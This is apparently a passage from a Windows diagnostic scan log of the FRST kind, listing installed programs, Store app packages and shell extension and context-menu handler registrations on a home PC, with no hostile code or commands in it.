Apple Application Support (64 bits) (HKLM\...\{6E7DF4EE-1976-4215-9D81-755AFC95687D}) (Version: 7.4 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{BA2A6DBB-B09A-43D8-84F3-21C1537B47D9}) (Version: 12.2.0.15 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{52D87F32-70E4-4348-8148-C0B9F35B1314}) (Version: 2.3.0.177 - Apple Inc.)
Arc (HKLM-x32\...\{CED8E25B-122A-4E80-B612-7F99B93284B3}) (Version: 1.0.0.9668 - Perfect World Entertainment)
Astute Manager (HKLM-x32\...\{52F7B33F-617B-4484-9986-E57B436C0442}) (Version: 0.0.6 - Astute Graphics)
Authy Desktop (HKU\S-1-5-21-3305917012-4270169547-4029195171-1001\...\authy-electron) (Version: 1.7.2 - Twilio Inc.)
Authy Desktop (HKU\S-1-5-21-3305917012-4270169547-4029195171-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12242019165851383\...\authy-electron) (Version: 1.7.2 - Twilio Inc.)
Backup and Sync from Google (HKLM\...\{93EBD8BA-7A14-4636-8F1F-E929ADF2C3A9}) (Version: 3.47.7654.0300 - Google, Inc.)
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Bitdefender Agent (HKLM\...\Bitdefender Agent) (Version: 23.0.8.132 - Bitdefender)
Bitdefender Device Management (HKLM\...\Bitdefender Device Management) (Version: 24.0.12.72 - Bitdefender)
Bitdefender Total Security (HKLM\...\Bitdefender) (Version: 23.0.19.85 - Bitdefender)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Brave (HKLM-x32\...\BraveSoftware Brave-Browser) (Version: 79.1.1.23 - Brave Software Inc)
Brave Nightly (HKLM-x32\...\BraveSoftware Brave-Browser-Nightly) (Version: 79.1.4.42 - Brave Software Inc)
calibre 64bit (HKLM\...\{AD46B379-13AD-4790-8137-2311E8825039}) (Version: 3.44.0 - Kovid Goyal)
Call of Duty Black Ops 4 (HKLM-x32\...\Call of Duty Black Ops 4) (Version:  - Blizzard Entertainment)
CCleaner (HKLM\...\CCleaner) (Version: 5.53 - Piriform)
Cheat Engine 6.8.3 (HKLM\...\Cheat Engine 6.8.3_is1) (Version:  - Cheat Engine)
Chrome Remote Desktop Host (HKLM-x32\...\{738276A2-92E7-4313-9E4D-D090F7DA98EC}) (Version: 79.0.3945.10 - Google Inc.)
Coinomi Wallet version 1.0.9 (HKLM\...\{EE5A628F-810E-44CF-B45E-CA24076FF104}_is1) (Version: 1.0.9 - Coinomi Ltd)
Core Temp 1.13 (HKLM\...\{086D343F-8E78-4AFC-81AC-D6D414AFD8AC}_is1) (Version: 1.13 - ALCPU)
Desinstalar impresora EPSON L1300 Series (HKLM\...\EPSON L1300 Series) (Version:  - SEIKO EPSON Corporation)
Discord (HKU\S-1-5-21-3305917012-4270169547-4029195171-1001\...\Discord) (Version: 0.0.305 - Discord Inc.)
Discord (HKU\S-1-5-21-3305917012-4270169547-4029195171-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12242019165851383\...\Discord) (Version: 0.0.305 - Discord Inc.)
Epic Games Launcher (HKLM-x32\...\{688B6799-8427-42C9-8C6A-ABFADCE86EBC}) (Version: 1.1.195.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Epson E-Web Print (HKLM-x32\...\{6BF9F374-EC67-4808-A90C-F127DE6D989D}) (Version: 1.23.0000 - SEIKO EPSON CORPORATION)
Epson Software Updater (HKLM-x32\...\{1028AD34-EB8A-4136-9A93-27FC60FD0A40}) (Version: 4.4.11 - Seiko Epson Corporation)
EVE Online (HKU\S-1-5-21-3305917012-4270169547-4029195171-1001\...\{321678af-bb5b-40f6-b370-7753635681d4}) (Version: 1.0.0 - CCP)
EVE Online (HKU\S-1-5-21-3305917012-4270169547-4029195171-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12242019165851383\...\{321678af-bb5b-40f6-b370-7753635681d4}) (Version: 1.0.0 - CCP)
FileZilla Client 3.43.0 (HKLM-x32\...\FileZilla Client) (Version: 3.43.0 - Tim Kosse)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 79.0.3945.88 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.421 - Google LLC) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.99.0 - Google Inc.) Hidden
GPU Temp version 1.0 (HKLM-x32\...\{8C8711FD-0FC8-4801-B33E-ED19BB0350B1}_is1) (Version: 1.0 - gputemp.com)
Guía interactiva EXANI-I (HKLM-x32\...\{C2D7231F-E271-48F9-ABCD-AA7E306755E8}) (Version: 1.1.0 - MUV)
Guía interactiva EXANI-II (HKLM-x32\...\{D8960B50-BA4F-45F1-8F70-EB2951D8AAB5}) (Version: 1.1.0 - MUV)
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version:  - Blizzard Entertainment)
HP Dropbox Plugin (HKLM-x32\...\{E33A1540-AF13-4F30-BEB5-3F4CD72AC7F9}) (Version: 36.0.175.0 - HP)
HP EmailSMTP Plugin (HKLM-x32\...\{CF4D7C86-DBA1-458D-990F-987A386091C8}) (Version: 43.0.175.0 - HP)
HP FTP Plugin (HKLM-x32\...\{B9FFA818-A8AE-406E-80EF-85A54A1C9F83}) (Version: 43.0.175.0 - HP)
HP Google Drive Plugin (HKLM-x32\...\{78CD6FCC-A6E9-4DCB-B137-FD691DB15CC6}) (Version: 36.0.175.0 - HP)
HP Ink Tank Wireless 410 series Ayuda (HKLM-x32\...\{1B44A563-C791-4886-9C29-B85050156A9E}) (Version: 44.0.0 - HP)
HP Ink Tank Wireless 410 series Software básico del dispositivo (HKLM\...\{0900D622-F110-45F0-94B1-2A244949F394}) (Version: 45.3.2597.18208 - HP Inc.)
HP OneDrive Plugin (HKLM-x32\...\{C79809ED-0E3D-43E9-9F45-FA43DFA1EFFD}) (Version: 36.0.175.0 - HP)
HP SFTP Plugin (HKLM-x32\...\{6E9B2B7C-1701-4DD3-80F7-B45ECA565DF9}) (Version: 43.0.175.0 - HP)
HP SharePoint Plugin (HKLM-x32\...\{41871A92-7684-456F-8BE2-AB570C641AEC}) (Version: 43.0.175.0 - HP)
Image Resizer for Windows (64 bit) (HKLM\...\{2A1F3759-5792-469B-B895-7E29680F02F1}) (Version: 3.1.1.0 - Brice Lambson) Hidden
Image Resizer for Windows (HKLM-x32\...\{92916BDF-74CB-479C-B69E-32EACB074FFE}) (Version: 3.1.1.0 - Brice Lambson) Hidden
Image Resizer for Windows (HKLM-x32\...\{c624f5da-779e-4ccb-9ce1-34bc5ef0a6b9}) (Version: 3.1.1.0 - Brice Lambson)
Intel(R) C++ Redistributables on Intel(R) 64 (HKLM-x32\...\{F70BCE36-25F2-4475-A918-6209B3D85BF3}) (Version: 15.0.179 - Intel Corporation)
Intel(R) Chipset Device Software (HKLM-x32\...\{fcfc894b-0d54-4d39-826f-dcb39ce5dde7}) (Version: 10.1.17861.8101 - Intel(R) Corporation)
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 1846.12.0.1177 - Intel Corporation)
Intel(R) Network Connections 23.5.0.0 (HKLM\...\PROSetDX) (Version: 23.5.0.0 - Intel)
Intel(R) Trusted Connect Service Client x86 (HKLM-x32\...\{C9552825-7BF2-4344-BA91-D3CD46F4C441}) (Version: 1.50.638.1 - Intel Corporation) Hidden
Intel(R) Trusted Connect Services Client (HKLM-x32\...\{99ee3c29-c7cd-450f-8db9-d43cc49de1c7}) (Version: 1.50.638.1 - Intel Corporation) Hidden
Internet Download Manager (HKLM\...\Internet Download Manager 6.32.2_is1) (Version: 6.32.2 - Tonec Inc.)
iTunes (HKLM\...\{9C4D8598-C1F2-468E-B587-F85558AA5EEE}) (Version: 12.9.4.102 - Apple Inc.)
Java 8 Update 221 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180221F0}) (Version: 8.0.2210.11 - Oracle Corporation)
JDownloader 2 (HKLM\...\jdownloader2) (Version: 2.0 - AppWork GmbH)
Kits Configuration Installer (HKLM-x32\...\{63AAA877-5536-9481-2385-28A082100D78}) (Version: 10.1.18362.1 - Microsoft) Hidden
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Lightshot-5.4.0.35 (HKLM-x32\...\{30A5B3C9-2084-4063-A32A-628A98DE512B}_is1) (Version: 5.4.0.35 - Skillbrains)
Logitech Gaming Software 9.02 (HKLM\...\Logitech Gaming Software) (Version: 9.02.65 - Logitech Inc.)
Malwarebytes version 4.0.4.49 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.0.4.49 - Malwarebytes)
MEGAsync (HKLM-x32\...\MEGAsync) (Version:  - Mega Limited)
Microsoft Office Profesional Plus 2016 - es-es (HKLM\...\ProplusRetail - es-es) (Version: 16.0.12228.20364 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3305917012-4270169547-4029195171-1001\...\OneDriveSetup.exe) (Version: 19.192.0926.0012 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3305917012-4270169547-4029195171-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12242019165851383\...\OneDriveSetup.exe) (Version: 19.192.0926.0012 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{402ED4A1-8F5B-387A-8688-997ABF58B8F2}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40660 (HKLM-x32\...\{61087a79-ac85-455c-934d-1fa22cc64f36}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.16.27033 (HKLM-x32\...\{cc3a7c63-31fb-4129-9024-63ebefd86a95}) (Version: 14.16.27033.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (HKLM-x32\...\{7e9fae12-5bbf-47fb-b944-09c49e75c061}) (Version: 14.15.26706.0 - Microsoft Corporation)
Minecraft Launcher (HKLM-x32\...\{D0972543-9D51-4A1A-A765-E5A7B1CB09E5}) (Version: 1.0.0.0 - Mojang)
Mozilla Firefox 70.0.1 (x64 en-US) (HKLM\...\Mozilla Firefox 70.0.1 (x64 en-US)) (Version: 70.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 67.0.4 - Mozilla)
NetLimiter 4 (HKLM\...\{AC8F026D-2606-46CD-BA72-33A9FAB2F715}) (Version: 4.0.42.0 - Locktime Software) Hidden
NetLimiter 4 (HKLM-x32\...\NetLimiter 4 4.0.42.0) (Version: 4.0.42.0 - Locktime Software)
Newsbin Pro (HKLM\...\Newsbin6) (Version: 6.81 - DJI Interprises, LLC)
Notepad++ (64-bit x64) (HKLM\...\Notepad++) (Version: 7.8.1 - Notepad++ Team)
Npcap 0.9983 (HKLM-x32\...\NpcapInst) (Version: 0.9983 - Nmap Project)
NVAPI Monitor plugin for NvContainer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvContainer.NvapiMonitor) (Version: 1.19 - NVIDIA Corporation) Hidden
NVIDIA GeForce Experience 3.20.1.57 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.20.1.57 - NVIDIA Corporation)
NVIDIA Software del sistema PhysX 9.19.0218 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.19.0218 - NVIDIA Corporation)
NZBGet (HKLM-x32\...\NZBGet) (Version:  - Andrey Prygunkov)
Office 16 Click-to-Run Extensibility Component (HKLM\...\{90160000-008C-0000-1000-0000000FF1CE}) (Version: 16.0.12228.20364 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-007E-0000-1000-0000000FF1CE}) (Version: 16.0.12228.20364 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM\...\{90160000-008C-0C0A-1000-0000000FF1CE}) (Version: 16.0.12228.20364 - Microsoft Corporation) Hidden
OnTopReplica (HKLM-x32\...\{F149C020-D121-45B2-A630-5DB052413244}) (Version: 3.5.1 - OnTopReplica)
Overwatch (HKLM-x32\...\Overwatch) (Version:  - Blizzard Entertainment)
Panel de control de NVIDIA 436.15 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.ControlPanel) (Version: 436.15 - NVIDIA Corporation) Hidden
PuTTY release 0.71 (64-bit) (HKLM\...\{B27534DB-4F72-4F49-A3AD-5EC1B6901E5E}) (Version: 0.71.0.0 - Simon Tatham)
qBittorrent 4.1.9.1 (HKLM-x32\...\qBittorrent) (Version: 4.1.9.1 - The qBittorrent project)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8586 - Realtek Semiconductor Corp.)
Revo Uninstaller Pro 3.1.8 (HKLM\...\{67579783-0FB7-4F7B-B881-E5BE47C9DBE0}_is1) (Version: 3.1.8 - VS Revo Group, Ltd.)
RivaTuner Statistics Server 7.2.3 (HKLM-x32\...\RTSS) (Version: 7.2.3 - Unwinder)
SlickVPN v0.2.61 (gde9faf8) (HKLM-x32\...\SlickVPN_is1) (Version: 0.2.61 - SlickVPN)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Tableta Wacom (HKLM\...\Wacom Tablet Driver) (Version: 6.3.34-3 - Wacom Technology Corp.)
Telegram Desktop version 1.8.15 (HKU\S-1-5-21-3305917012-4270169547-4029195171-1001\...\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1) (Version: 1.8.15 - Telegram FZ-LLC)
Telegram Desktop version 1.8.15 (HKU\S-1-5-21-3305917012-4270169547-4029195171-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12242019165851383\...\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1) (Version: 1.8.15 - Telegram FZ-LLC)
Twitch (HKU\S-1-5-21-3305917012-4270169547-4029195171-1001\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 8.0.0 - Twitch Interactive, Inc.)
Twitch (HKU\S-1-5-21-3305917012-4270169547-4029195171-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-12242019165851383\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 8.0.0 - Twitch Interactive, Inc.)
UE4 Prerequisites (x64) (HKLM-x32\...\{2890ae6b-90e9-448d-b3e6-97e43c21e2fd}) (Version: 1.0.13.0 - Epic Games, Inc.) Hidden
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.8 - VideoLAN)
Windows Software Development Kit - Windows 10.0.18362.1 (HKLM-x32\...\{126dedf0-cc0e-4b48-9ece-806b0e437195}) (Version: 10.1.18362.1 - Microsoft Corporation)
WinRAR 5.61 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.61.0 - win.rar GmbH)
Wireshark 3.0.6 64-bit (HKLM-x32\...\Wireshark) (Version: 3.0.6 - The Wireshark developer community, hxxps://www.wireshark.org)
Wolfram Mathematica 12 (M-WIN-L 12.0.0 6206958) (HKLM\...\M-WIN-L 12.0.0 6206958_is1) (Version: 12.0.0 - Wolfram Research, Inc.)
WolframScript (A-WIN32-WolframScript 12.0.0 2019040701) (HKLM-x32\...\{460ACB2E-59A1-11E9-848B-0CC47AC03162}) (Version: 12.0.89 - Wolfram Research, Inc.)
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version:  - Blizzard Entertainment)
WPT Redistributables (HKLM-x32\...\{70D0B057-048B-F699-A2B0-AD325018802F}) (Version: 10.1.18362.1 - Microsoft) Hidden
WPTx64 (HKLM-x32\...\{EC12C121-3208-5E92-FCB0-0591769632F9}) (Version: 10.1.18362.1 - Microsoft) Hidden
Yeti Pro Driver v2.23.0 (HKLM-x32\...\Yeti Pro Driver v2.23.0) (Version: 2.23.0 - BLUE)

Packages:
=========
Acrobat Notification Client -> C:\Program Files\WindowsApps\AcrobatNotificationClient_1.0.4.0_x86__e1rzdqpraam7r [2019-04-18] (Adobe Systems Incorporated)
Adobe Notification Client -> C:\Program Files\WindowsApps\AdobeNotificationClient_1.0.1.22_x86__enpm4xejd91yc [2019-08-26] (Adobe Systems Incorporated)
Candy Crush Friends -> C:\Program Files\WindowsApps\king.com.CandyCrushFriends_1.27.6.0_x86__kgqvnymyfvs32 [2019-12-13] (king.com)
Candy Crush Saga -> C:\Program Files\WindowsApps\king.com.CandyCrushSaga_1.1661.1.0_x86__kgqvnymyfvs32 [2019-12-20] (king.com)
Dolby Access -> C:\Program Files\WindowsApps\DolbyLaboratories.DolbyAccess_3.1.3842.0_x64__rz1tebttyb220 [2019-12-16] (Dolby Laboratories)
Fitbit Coach -> C:\Program Files\WindowsApps\Fitbit.FitbitCoach_4.4.133.0_x64__6mqt6hf9g46tw [2019-11-21] (Fitbit)
HP Smart -> C:\Program Files\WindowsApps\AD2F1837.HPPrinterControl_105.1.623.0_x64__v10z8vjag6ke6 [2019-11-15] (HP Inc.)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-04-08] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-04-08] (Microsoft Corporation) [MS Ad]
Microsoft Noticias -> C:\Program Files\WindowsApps\Microsoft.BingNews_4.34.13393.0_x64__8wekyb3d8bbwe [2019-12-18] (Microsoft Corporation) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.5.12061.0_x64__8wekyb3d8bbwe [2019-12-12] (Microsoft Studios) [MS Ad]
Minecraft for Windows 10 -> C:\Program Files\WindowsApps\Microsoft.MinecraftUWP_1.14.105.0_x64__8wekyb3d8bbwe [2019-12-20] (Microsoft Studios)
MSN El tiempo -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.34.13393.0_x64__8wekyb3d8bbwe [2019-12-18] (Microsoft Corporation) [MS Ad]
Phototastic Collage -> C:\Program Files\WindowsApps\ThumbmunkeysLtd.PhototasticCollage_2.2.16.0_x64__nfy108tqq3p12 [2019-11-21] (Thumbmunkeys Ltd) [MS Ad]
Realtek Audio Control -> C:\Program Files\WindowsApps\RealtekSemiconductorCorp.RealtekAudioControl_1.2.158.0_x64__dt26b99r8h8gj [2019-03-20] (Realtek Semiconductor Corp)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3305917012-4270169547-4029195171-1001_Classes\CLSID\{0E270DAA-1BE6-48F2-AC49-380993785BEE} -> [Creative Cloud Files] => C:\Users\saenz\Creative Cloud Files [2019-02-27 13:10]
CustomCLSID: HKU\S-1-5-21-3305917012-4270169547-4029195171-1001_Classes\CLSID\{BB714201-BEFF-4275-932D-8AAE21D603C1} -> [Descargas Mega] => F:\Descargas\Descargas Mega [2019-05-10 17:41]
CustomCLSID: HKU\S-1-5-21-3305917012-4270169547-4029195171-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Inc. -> Adobe Systems)
ShellIconOverlayIdentifiers: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\saenz\AppData\Local\MEGAsync\ShellExtX64.dll [2019-09-09] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\saenz\AppData\Local\MEGAsync\ShellExtX64.dll [2019-09-09] (Mega Limited -> )
ShellIconOverlayIdentifiers: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\saenz\AppData\Local\MEGAsync\ShellExtX64.dll [2019-09-09] (Mega Limited -> )
ShellIconOverlayIdentifiers: [			IDM Shell Extension] -> {CDC95B92-E27C-4745-A8C5-64A52A78855D} => C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll [2018-05-12] (Tonec Inc. -> Tonec Inc.)
ShellIconOverlayIdentifiers: [   AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2018-03-05] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [   AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2018-03-05] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [   AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2018-03-05] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [  GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files\Google\Drive\googledrivesync64.dll [2019-10-24] (Google LLC -> Google)
ShellIconOverlayIdentifiers: [  GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files\Google\Drive\googledrivesync64.dll [2019-10-24] (Google LLC -> Google)
ShellIconOverlayIdentifiers: [  GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files\Google\Drive\googledrivesync64.dll [2019-10-24] (Google LLC -> Google)
ShellIconOverlayIdentifiers-x32: [ MEGA (Pending)] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\saenz\AppData\Local\MEGAsync\ShellExtX64.dll [2019-09-09] (Mega Limited -> )
ShellIconOverlayIdentifiers-x32: [ MEGA (Synced)] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\saenz\AppData\Local\MEGAsync\ShellExtX64.dll [2019-09-09] (Mega Limited -> )
ShellIconOverlayIdentifiers-x32: [ MEGA (Syncing)] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\saenz\AppData\Local\MEGAsync\ShellExtX64.dll [2019-09-09] (Mega Limited -> )
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2018-03-05] (Adobe Systems Incorporated -> )
ContextMenuHandlers1: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat Elements\ContextMenuShim64.dll [2019-12-02] (Adobe Inc. -> Adobe Systems Inc.)
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files\Notepad++\NppShell_06.dll [2019-06-16] (Notepad++ -> )
ContextMenuHandlers1: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files\Google\Drive\contextmenu64.dll [2019-10-24] (Google LLC -> Google)
ContextMenuHandlers1: [Image Resizer] -> {51B4D7E5-7568-4234-B4BB-47FB3C016A69} => C:\Program Files\Image Resizer for Windows\ShellExtensions.dll [2018-05-26] (Open Source Developer, Brice Lambson -> Brice Lambson)
ContextMenuHandlers1: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\saenz\AppData\Local\MEGAsync\ShellExtX64.dll [2019-09-09] (Mega Limited -> )
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2018-09-30] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2018-09-30] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\saenz\AppData\Local\MEGAsync\ShellExtX64.dll [2019-09-09] (Mega Limited -> )
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-12-23] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers3: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\saenz\AppData\Local\MEGAsync\ShellExtX64.dll [2019-09-09] (Mega Limited -> )
ContextMenuHandlers4: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files\Google\Drive\contextmenu64.dll [2019-10-24] (Google LLC -> Google)
ContextMenuHandlers4: [MEGA (Context menu)] -> {0229E5E7-09E9-45CF-9228-0228EC7D5F17} => C:\Users\saenz\AppData\Local\MEGAsync\ShellExtX64.dll [2019-09-09] (Mega Limited -> )
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\WINDOWS\system32\nvshext.dll [2019-08-24] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2018-03-05] (Adobe Systems Incorporated -> )
ContextMenuHandlers6: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat Elements\ContextMenuShim64.dll [2019-12-02] (Adobe Inc. -> Adobe Systems Inc.)
